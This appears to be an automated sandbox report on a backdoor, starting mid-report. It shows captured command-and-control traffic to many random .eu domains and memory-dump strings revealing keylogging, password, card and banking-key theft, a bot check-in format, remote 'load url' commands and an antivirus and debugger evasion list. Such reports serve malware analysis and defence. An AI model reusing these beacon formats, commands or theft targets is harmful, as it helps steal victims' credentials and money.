<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.lykemujebeq.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
5f7..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="hXXp://VVV.w3.org/1999/xhtml">..<head>...<title>lykemujebeq.eu</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'lykemujebeq.eu';.var uniqueTrackingID = 'MTQ0ODAxMDU0NC40MTkxOjE1YmU1MTI1NmIwMmNjOGVjOTIyNDFiNDdhNTAzYTczYjRjNzZkOWE1NDkxMWFlMGY3MGE3ODg3ZTM2YjEwOWU6NTY0ZWUzMzA2NjU3MA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var rxid = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='hXXp://parkingcrew.net/assets/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type='text/javascript' language='JavaScript'>themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQwMTF8fGJ1Y2tldDA0OHx8fHw1NjRlZTMzMDYzM2QyfHx8MTQ0ODAxMDU0NC40MjM0fGQ5OWFlODRlM2MzYzY0MmVlY2M3YzlkNjhkMWQ1MDhlMDkwZWZiZGF8fHx8fDF8fHwwfDU2NGVlMzMwODhmYmNlMTBiMDhiNDliZnx8fDB8fHx8fHwwfHx8fHx8fHx8';</script>..</head>..<body>...<script type='text/javascript' language='JavaScript'>.window.onload = function() {..if(clickTracking && typeof track_onclick == 'function') track_onclick("899acbee21dc3d6ea9c8cc64f2f4d6bff340bcc0");..top.location.href = "http:/
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.qebahilojam.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:28 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
<<< skipped >>>
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.galokusemus.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:24 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
<<< skipped >>>
GET /domain/kemocujufys.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=1acef55da687a834a563e6c7f72341c6; domain=.kemocujufys.eu
Location: hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6
3e..Go hXXp://xsso.kemocujufys.eu/1acef55da687a834a563e6c7f72341c6..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: novomyfexij.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:06 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.novomyfexij.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/nopegymozow.eu
Set-Cookie: btst=c5be0b98ef08bd0e96394b12a6af6382|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww62.ganycyhywek.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:18:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Check: 3c12dc4d54f8e22d666785b733b0052100c53444
X-Language: english
X-Template: tpl_CleanPeppermintBlack_twoclick
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/kemocujufys.eu
Set-Cookie: btst=cc6592e9d00c7d5db9df2b8578caaed5|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qeqinuqypoq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/qeqinuqypoq.eu
Set-Cookie: btst=aad574aa2a3f3a3a77f150faa40af1c1|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
GET /domain/marytymenok.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=4abc123f5bc1fe014bbeb686d9306960; domain=.marytymenok.eu
Location: hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960
3e..Go hXXp://xsso.marytymenok.eu/4abc123f5bc1fe014bbeb686d9306960..0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:34 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.jeluganusog.eu
Vary: Accept-Encoding
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.mamixikusah.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=902vr1955561446822064; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.mamixikusah.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_E5ctNWYbOACFNFHzMXICBsMMGZkpWyb55HTQEonWKc3xGetb5uMdGl4xpB/ tujq FLQ8CwmdQO8iK5I/aZJPA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lysovidacyx.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:30 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ze1.zeroredirect1.com/zcvisitor/56383af2-8f66-11e5-9f3b-06d3db30a525
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: masawocipel.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:22:11 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww92.masawocipel.eu
Vary: Accept-Encoding
GET /domain/gatedyhavyd.eu HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: sso.anbtr.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=daf1516824a145639bf41787e2765d81; domain=.gatedyhavyd.eu
Location: hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81
3e..Go hXXp://xsso.gatedyhavyd.eu/daf1516824a145639bf41787e2765d81..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.jeluganusog.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:07 GMT
Server: Apache
Set-Cookie: vsid=917vr1955561475706158; expires=Wed, 18-Nov-2020 09:09:07 GMT; path=/; domain=ww92.jeluganusog.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QdTvYwKqBf ZsOsVZ7cGDuNJ3ob9YBc0a XFW JiVUj0oPVcpeguRM9nl3Pk 96z 6gqNpelGzkIX2n6QnIDbg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=51
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ganycyhywek.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:38 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww62.ganycyhywek.eu
Vary: Accept-Encoding
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.masawocipel.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:43 GMT
Server: Apache
Set-Cookie: vsid=919vr1955561836832705; expires=Wed, 18-Nov-2020 09:09:43 GMT; path=/; domain=ww92.masawocipel.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_pE7W RhrpHJkipnzR2jqUkC1XUbVql200l1k7tBKu1f5ZHrGd/MHf0BPvZcLsIZCH2DlA5A 52/jQSHUrcu 5A==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=58
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
GET /d1e2832667be3ac8af2587e3c0958424 HTTP/1.1
Host: xsso.tucyguqaciq.eu
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Cookie: btst=e3ae6590680be4ef924aaa5811bb8a71|194.242.96.218|1448010539|1448010539|0|1|0; snkz=194.242.96.218
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 20 Nov 2015 09:09:00 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: anbtr=d1e2832667be3ac8af2587e3c0958424; domain=.tucyguqaciq.eu
19..Landed tucyguqaciq.eu<br>..0..
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.ryleryqacic.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:04 GMT
Server: Apache
Set-Cookie: vsid=916vr1955561446614594; expires=Wed, 18-Nov-2020 09:09:04 GMT; path=/; domain=ww92.ryleryqacic.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_MXe35p2lNstiKSHWMtOds0d8rQZO7ce/tksvqLTZdKxkPcF7KPo0R4Hh T7IzihVXt6F2QHQQlvhp7OhwF6Npg==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=109
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 20 Nov 2015 09:08:59 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Location: hXXp://sso.anbtr.com/domain/gatedyhavyd.eu
Set-Cookie: btst=5cdf1e54d8e3563b09609288cb6405b8|194.242.96.218|1448010539|1448010539|0|1|0
Set-Cookie: snkz=194.242.96.218
0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:52 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.10-1ubuntu3.11
Location: hXXp://ww92.xuqufyduras.eu
Vary: Accept-Encoding
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 302 Found
Server: nginx
Date: Fri, 20 Nov 2015 08:21:55 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.4.36-0 deb7u3
Location: hXXp://ww62.xuqufyduras.eu
Vary: Accept-Encoding
GET / HTTP/1.1
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ww92.novomyfexij.eu
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 20 Nov 2015 09:09:36 GMT
Server: Apache
Set-Cookie: vsid=914vr1955561764501275; expires=Wed, 18-Nov-2020 09:09:36 GMT; path=/; domain=ww92.novomyfexij.eu; httponly
X-Frame-Options: DENY
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4 L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_KajKUXIfGlknPkznMqCMpRUDEKQ3NcExPCnrQr7/AJUghR8m7ldUp5ek/kGWNZ53biy6ejgxapSVMm4wnNZMWA==
Vary: Accept-Encoding,User-Agent
Content-Length: 1686
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<<< skipped >>>
Map
The Backdoor connects to the servers at the following location(s):
Strings from Dumps
Explorer.EXE_1572_rwx_01EA0000_000B2000:
.text
`.data
.reloc
`.rdata
@.data
http
PASSu98V
PASSu08V
FTPQ
12345678
password1
monkey
monkey1
password
Pname.key
\secrets.key
kernel32.dll
\explorer.exe
user32.dll
multi_pot.exe
HookExplorer.exe
proc_analyzer.exe
sckTool.exe
sniff_hit.exe
sysAnalyzer.exe
idag.exe
ollydbg.exe
dumpcap.exe
wireshark.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
sysinfo.log
scr.jpg
minidump.bin
%d.%d.%d.%d
Ý %dh %dm
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
url%i
4.8.14
%dx%d@%d
%c%d:d
{Windows directory:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
93.191.13.100
drweb
eset.com
z-oleg.com
kltest.org.ru
.comodo.com
google.com
Dnsapi.dll
ws2_32.dll
Referer: hXXp://VVV.google.com
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
/search.php
Winmm.dll
Kernel32.dll
Gdi32.dll
ntdll.dll
hXXp://
hXXps://
HTTP/1.
nspr4.dll
PR_OpenTCPSocket
[[[URL: %s
Process: %s
User-agent: %s]]]
{{{%s
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
set_url
microsoft.public.win32.programmer.kernel
\iexplore.exe
\firefox.exe
keygrab
u.jpg
IprivLibEx.dll
\\.\PhysicalDrive%u
/topic.php
keylog.txt
sniff.log
passwords.txt
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.microsoft.com
frd.exe
command=config&update_url=
&port=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.8.14&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\svchost.exe
\opera.exe
\cbmain.ex
\iscc.exe
\clmain.exe
\wclnt.exe
internal_wutex_0xx
%s.dbf
%s.DBF
pop2://%s:%s@%s:%i
pop3://%s:%s@%s:%i
nntp://%s:%s@%s:%i
PTF://%s:%s@%s:%i
PTF://anonymous:
AUTHINFO PASS
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
login=
password=
pass_
ssleay32.dll
advapi32.dll
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.jpg
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
private.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
Local\{BQQQW777-B777-4e47-8B10-69798A04C732}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4EEE-9A0D-95CD39DC0A14}
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
cert.pem
cert.pem
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
Local\{BE3CEFA7-B777-4e47-8B10-69745D04C732}
winmm.dll
winmm.dll
1.2.5
1.2.5
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
%s\%s
%s\%s
#webcam
#webcam
#webcam%d
#webcam%d
RFB d.d
RFB d.d
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
